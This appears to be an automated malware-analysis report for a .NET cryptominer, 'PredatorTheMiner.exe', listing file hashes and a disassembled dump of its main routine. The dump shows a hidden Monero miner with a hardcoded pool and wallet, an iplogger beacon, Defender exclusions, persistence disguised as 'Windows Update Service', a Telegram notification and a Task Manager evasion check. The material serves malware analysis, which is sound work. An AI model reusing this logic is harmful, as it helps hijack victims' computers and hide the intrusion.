5452f5e780a1964b7b48c04459b91c78
PE Executable | MD5: 5452f5e780a1964b7b48c04459b91c78 | Size: 1.96 MB | application/x-dosexec
Symbol Ofbuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 5452f5e780a1964b7b48c04459b91c78
|
| Sha1 | cc8d20657003ccbc1a8a7ee6ca457d412e26f786
|
| Sha256 | ac9b66046e7b48690eec441a018373e654b164cdb01957f1712d39404063517f
|
| Sha384 | 25ad831474965a1ba79bc2f206dde86fd8c27992c2001fe6104062957e39b98d1a9ad2c8c190f348a89229d881782654
|
| Sha512 | 2d0255ce376a019087dbe372899eb5e5e780429ddd6d0e9e7a0a9469c4823432fd30623d132e1197c3cf1bfd16dc63cc9a3a60daf2311421af806e377fb32695
|
| SSDeep | 49152:W8zt1S0tH8/SXCsHhJbv/vnvyYN1HFEHJ:Vzfp8qX/TnXHvlEp
|
| TLSH | 1195237B3695C969C733A2B0A8A3E58CFEA33F1729B683171714738D55BBA00C679143
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Info | PDB Path: C:\Users\vboxuser\Desktop\Silent-Miner-XMR-Monero WIN7-WIN 10-master\Silent-Miner-XMR-Monero-master\obj\Release\PredatorTheMiner.pdb |
| Module Name | PredatorTheMiner.exe |
| Full Name | PredatorTheMiner.exe |
| EntryPoint | System.Void PredatorTheMiner.Program::Main() |
| Scope Name | PredatorTheMiner.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | PredatorTheMiner |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.8 |
| Total Strings | 83 |
| Main Method | System.Void PredatorTheMiner.Program::Main() |
| Main IL Instruction Count | 230 |
| Main IL | ldstr LocalAppData call System.String System.Environment::GetEnvironmentVariable(System.String) dup <null> ldstr \Streamm.exe call System.String System.String::Concat(System.String,System.String) stloc.0 <null> dup <null> ldstr \runtime-servece.exe call System.String System.String::Concat(System.String,System.String) stloc.1 <null> dup <null> ldstr \start_miner.vbs call System.String System.String::Concat(System.String,System.String) stloc.2 <null> ldstr \.sysconfig call System.String System.String::Concat(System.String,System.String) stloc.3 <null> ldloc.0 <null> ldloc.1 <null> ldloc.2 <null> ldloc.3 <null> call System.Boolean PredatorTheMiner.Program::IsAlreadyInstalled(System.String,System.String,System.String,System.String) brfalse.s IL_0049: ldstr "https://iplogger.com/2j5MD5" leave IL_029C: ret ldstr https://iplogger.com/2j5MD5 call System.Boolean PredatorTheMiner.Helper::SiteConnection(System.String) pop <null> newobj System.Void System.Random::.ctor() ldc.i4.1 <null> ldc.i4 100001 callvirt System.Int32 System.Random::Next(System.Int32,System.Int32) stloc.s V_4 ldloca.s V_4 call System.String System.Int32::ToString() stloc.s V_5 newobj System.Void System.Diagnostics.Process::.ctor() stloc.s V_6 ldloc.s V_6 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) ldloc.s V_6 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) ldloc.s V_6 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldstr --url={0} --user={1} --pass={4} --donate-level=1 --keepalive --retries=5 --max-cpu-usage={3} --cpu-priority=2 ldc.i4.5 <null> newarr System.Object dup <null> ldc.i4.0 <null> ldstr xmr.kryptex.network:7029 stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr 48sJ3RQVWcR4tHeemmq4cTAwYgTzGeiFWjhSfpphAtmdgDUUX7VMjLUKoWer3FjB8MXLvhocXwcbZUbrQF39gFUAHibpxEM stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr 0x3 stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr 75 stelem.ref <null> dup <null> ldc.i4.4 <null> ldloc.s V_5 stelem.ref <null> call System.String System.String::Format(System.String,System.Object[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.0 <null> ldloc.1 <null> ldloc.2 <null> call System.Void PredatorTheMiner.RunTime/DefenderExclusion::SetupAllExclusions(System.String,System.String,System.String) leave.s IL_00DE: ldloc.0 pop <null> leave.s IL_00DE: ldloc.0 ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_00F3: nop call System.String PredatorTheMiner.Program::get_StartPath() ldloc.0 <null> call System.Boolean System.String::op_Inequality(System.String,System.String) brfalse.s IL_0119: nop nop <null> ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0102: call System.String PredatorTheMiner.Program::get_StartPath() ldloc.0 <null> call System.Void System.IO.File::Delete(System.String) call System.String PredatorTheMiner.Program::get_StartPath() ldloc.0 <null> call System.Void System.IO.File::Copy(System.String,System.String) ldloc.0 <null> ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) leave.s IL_0119: nop pop <null> leave.s IL_0119: nop nop <null> ldloc.s V_6 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() callvirt System.String System.Diagnostics.ProcessStartInfo::get_Arguments() stloc.s V_7 ldstr Set WshShell = CreateObject("WScript.Shell") stloc.s V_8 ldc.i4.6 <null> newarr System.String dup <null> ldc.i4.0 <null> ldloc.s V_8 stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr WshShell.Run """ stelem.ref <null> dup <null> ldc.i4.2 <null> ldloc.1 <null> stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr "" stelem.ref <null> dup <null> ldc.i4.4 <null> ldloc.s V_7 stelem.ref <null> dup <null> ldc.i4.5 <null> ldstr ", 0, False stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_8 ldloc.2 <null> ldloc.s V_8 call System.Void System.IO.File::WriteAllText(System.String,System.String) ldloc.2 <null> ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) leave.s IL_0176: ldc.i4.0 pop <null> leave.s IL_0176: ldc.i4.0 ldc.i4.0 <null> call System.Void PredatorTheMiner.RunTime/Defend::SetupDefend(PredatorTheMiner.RunTime/Defend/DefendOptions) ldstr Windows_launcher newobj System.Void PredatorTheMiner.Implant/ScheduleTask::.ctor(System.String) ldstr wscript.exe " ldloc.2 <null> ldstr " call System.String System.String::Concat(System.String,System.String,System.String) call System.Void PredatorTheMiner.Implant/ScheduleTask::AddTask(System.String) ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) dup <null> ldstr Windows Update Service ldstr wscript.exe " ldloc.2 <null> ldstr " call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) callvirt System.Void Microsoft.Win32.RegistryKey::Close() leave.s IL_01D0: ldloc.1 pop <null> leave.s IL_01D0: ldloc.1 ldloc.1 <null> call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_01E3: ldloc.s V_6 ldloc.1 <null> call System.Byte[] PredatorTheMiner.Properties.Resources::get_shost() call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.s V_6 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldloc.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) ldloc.s V_6 callvirt System.Boolean System.Diagnostics.Process::Start() pop <null> ldloc.3 <null> call System.Void PredatorTheMiner.Program::CreateInstallationMarker(System.String) call System.Void PredatorTheMiner.Program::SendTelegramNotification() call System.String PredatorTheMiner.Program::get_StartPath() ldloc.0 <null> call System.Boolean System.String::op_Inequality(System.String,System.String) brfalse.s IL_021A: call System.Void PredatorTheMiner.Helper::AuthorFee() call System.Void PredatorTheMiner.Helper::DeleteMe() leave.s IL_021A: call System.Void PredatorTheMiner.Helper::AuthorFee() pop <null> leave.s IL_021A: call System.Void PredatorTheMiner.Helper::AuthorFee() call System.Void PredatorTheMiner.Helper::AuthorFee() ldstr taskmgr call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_0283: ldloc.s V_6 ldstr Taskmgr call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_0283: ldloc.s V_6 ldstr ProcessHacker call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_0283: ldloc.s V_6 call System.Boolean System.Environment::get_HasShutdownStarted() brtrue.s IL_0283: ldloc.s V_6 ldstr ldstr Task Manager call System.IntPtr PredatorTheMiner.Program::FindWindow(System.String,System.String) ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Inequality(System.IntPtr,System.IntPtr) brtrue.s IL_0283: ldloc.s V_6 ldstr ldstr Диспетчер задач call System.IntPtr PredatorTheMiner.Program::FindWindow(System.String,System.String) ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Inequality(System.IntPtr,System.IntPtr) brfalse.s IL_0290: ldc.i4.s 10 ldloc.s V_6 callvirt System.Void System.Diagnostics.Process::Kill() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldc.i4.s 10 call System.Void System.Threading.Thread::Sleep(System.Int32) br.s IL_021F: ldstr "taskmgr" pop <null> leave.s IL_029C: ret ret <null> |
| Module Name | PredatorTheMiner.exe |
| Full Name | PredatorTheMiner.exe |
| EntryPoint | System.Void PredatorTheMiner.Program::Main() |
| Scope Name | PredatorTheMiner.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | PredatorTheMiner |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.8 |
| Total Strings | 83 |
| Main Method | System.Void PredatorTheMiner.Program::Main() |
| Main IL Instruction Count | 230 |
| Main IL | ldstr LocalAppData call System.String System.Environment::GetEnvironmentVariable(System.String) dup <null> ldstr \Streamm.exe call System.String System.String::Concat(System.String,System.String) stloc.0 <null> dup <null> ldstr \runtime-servece.exe call System.String System.String::Concat(System.String,System.String) stloc.1 <null> dup <null> ldstr \start_miner.vbs call System.String System.String::Concat(System.String,System.String) stloc.2 <null> ldstr \.sysconfig call System.String System.String::Concat(System.String,System.String) stloc.3 <null> ldloc.0 <null> ldloc.1 <null> ldloc.2 <null> ldloc.3 <null> call System.Boolean PredatorTheMiner.Program::IsAlreadyInstalled(System.String,System.String,System.String,System.String) brfalse.s IL_0049: ldstr "https://iplogger.com/2j5MD5" leave IL_029C: ret ldstr https://iplogger.com/2j5MD5 call System.Boolean PredatorTheMiner.Helper::SiteConnection(System.String) pop <null> newobj System.Void System.Random::.ctor() ldc.i4.1 <null> ldc.i4 100001 callvirt System.Int32 System.Random::Next(System.Int32,System.Int32) stloc.s V_4 ldloca.s V_4 call System.String System.Int32::ToString() stloc.s V_5 newobj System.Void System.Diagnostics.Process::.ctor() stloc.s V_6 ldloc.s V_6 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) ldloc.s V_6 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) ldloc.s V_6 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldstr --url={0} --user={1} --pass={4} --donate-level=1 --keepalive --retries=5 --max-cpu-usage={3} --cpu-priority=2 ldc.i4.5 <null> newarr System.Object dup <null> ldc.i4.0 <null> ldstr xmr.kryptex.network:7029 stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr 48sJ3RQVWcR4tHeemmq4cTAwYgTzGeiFWjhSfpphAtmdgDUUX7VMjLUKoWer3FjB8MXLvhocXwcbZUbrQF39gFUAHibpxEM stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr 0x3 stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr 75 stelem.ref <null> dup <null> ldc.i4.4 <null> ldloc.s V_5 stelem.ref <null> call System.String System.String::Format(System.String,System.Object[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.0 <null> ldloc.1 <null> ldloc.2 <null> call System.Void PredatorTheMiner.RunTime/DefenderExclusion::SetupAllExclusions(System.String,System.String,System.String) leave.s IL_00DE: ldloc.0 pop <null> leave.s IL_00DE: ldloc.0 ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_00F3: nop call System.String PredatorTheMiner.Program::get_StartPath() ldloc.0 <null> call System.Boolean System.String::op_Inequality(System.String,System.String) brfalse.s IL_0119: nop nop <null> ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0102: call System.String PredatorTheMiner.Program::get_StartPath() ldloc.0 <null> call System.Void System.IO.File::Delete(System.String) call System.String PredatorTheMiner.Program::get_StartPath() ldloc.0 <null> call System.Void System.IO.File::Copy(System.String,System.String) ldloc.0 <null> ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) leave.s IL_0119: nop pop <null> leave.s IL_0119: nop nop <null> ldloc.s V_6 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() callvirt System.String System.Diagnostics.ProcessStartInfo::get_Arguments() stloc.s V_7 ldstr Set WshShell = CreateObject("WScript.Shell") stloc.s V_8 ldc.i4.6 <null> newarr System.String dup <null> ldc.i4.0 <null> ldloc.s V_8 stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr WshShell.Run """ stelem.ref <null> dup <null> ldc.i4.2 <null> ldloc.1 <null> stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr "" stelem.ref <null> dup <null> ldc.i4.4 <null> ldloc.s V_7 stelem.ref <null> dup <null> ldc.i4.5 <null> ldstr ", 0, False stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_8 ldloc.2 <null> ldloc.s V_8 call System.Void System.IO.File::WriteAllText(System.String,System.String) ldloc.2 <null> ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) leave.s IL_0176: ldc.i4.0 pop <null> leave.s IL_0176: ldc.i4.0 ldc.i4.0 <null> call System.Void PredatorTheMiner.RunTime/Defend::SetupDefend(PredatorTheMiner.RunTime/Defend/DefendOptions) ldstr Windows_launcher newobj System.Void PredatorTheMiner.Implant/ScheduleTask::.ctor(System.String) ldstr wscript.exe " ldloc.2 <null> ldstr " call System.String System.String::Concat(System.String,System.String,System.String) call System.Void PredatorTheMiner.Implant/ScheduleTask::AddTask(System.String) ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) dup <null> ldstr Windows Update Service ldstr wscript.exe " ldloc.2 <null> ldstr " call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) callvirt System.Void Microsoft.Win32.RegistryKey::Close() leave.s IL_01D0: ldloc.1 pop <null> leave.s IL_01D0: ldloc.1 ldloc.1 <null> call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_01E3: ldloc.s V_6 ldloc.1 <null> call System.Byte[] PredatorTheMiner.Properties.Resources::get_shost() call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.s V_6 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldloc.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) ldloc.s V_6 callvirt System.Boolean System.Diagnostics.Process::Start() pop <null> ldloc.3 <null> call System.Void PredatorTheMiner.Program::CreateInstallationMarker(System.String) call System.Void PredatorTheMiner.Program::SendTelegramNotification() call System.String PredatorTheMiner.Program::get_StartPath() ldloc.0 <null> call System.Boolean System.String::op_Inequality(System.String,System.String) brfalse.s IL_021A: call System.Void PredatorTheMiner.Helper::AuthorFee() call System.Void PredatorTheMiner.Helper::DeleteMe() leave.s IL_021A: call System.Void PredatorTheMiner.Helper::AuthorFee() pop <null> leave.s IL_021A: call System.Void PredatorTheMiner.Helper::AuthorFee() call System.Void PredatorTheMiner.Helper::AuthorFee() ldstr taskmgr call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_0283: ldloc.s V_6 ldstr Taskmgr call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_0283: ldloc.s V_6 ldstr ProcessHacker call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_0283: ldloc.s V_6 call System.Boolean System.Environment::get_HasShutdownStarted() brtrue.s IL_0283: ldloc.s V_6 ldstr ldstr Task Manager call System.IntPtr PredatorTheMiner.Program::FindWindow(System.String,System.String) ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Inequality(System.IntPtr,System.IntPtr) brtrue.s IL_0283: ldloc.s V_6 ldstr ldstr Диспетчер задач call System.IntPtr PredatorTheMiner.Program::FindWindow(System.String,System.String) ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Inequality(System.IntPtr,System.IntPtr) brfalse.s IL_0290: ldc.i4.s 10 ldloc.s V_6 callvirt System.Void System.Diagnostics.Process::Kill() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldc.i4.s 10 call System.Void System.Threading.Thread::Sleep(System.Int32) br.s IL_021F: ldstr "taskmgr" pop <null> leave.s IL_029C: ret ret <null> |